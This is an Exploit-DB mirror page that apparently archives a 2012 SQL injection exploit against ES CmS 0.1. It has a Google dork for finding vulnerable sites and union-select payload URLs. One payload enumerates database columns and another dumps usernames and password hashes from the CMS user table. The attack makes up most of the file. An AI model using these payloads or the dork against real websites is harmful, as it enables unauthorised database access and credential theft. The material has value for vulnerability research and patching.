bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/22907.txt
Offensive Security d304cc3d3e DB: 2017-11-24 
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

32 lines
No EOL
736 B
Text
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: ES CmS 0.1 Sql Injection Vulnerability
# Google Dork: inurl:/page.php?id=
# Date: 2012
# Exploit Author: MR.XpR
# Software Link: http://es-cms.com , http://sourceforge.net/projects/escms/files/esCMS Alpha/0.1/escms_alpha_v0_1.zip
# Version: v.0.1
# Tested on: BT , 7
# Poc :
http://localhost/page.php?id=[sqli]
# D3mo :
http://server/page.php?id=-1+union+select+1,2,3,group_concat(column_name),5,6+from+information_schema.columns+where+table_name=char(table_cod)
http://server/page.php?id=-1+union+select+1,2,3,group_concat(nazwa,0x3a,haslo),5,6+from+es_cms_users
# TNx To :
My Brothers Siamak.Black(Black.Boy) , UnknowN
everything is not true ,The real is dream
Reference in a new issue View git blame Copy permalink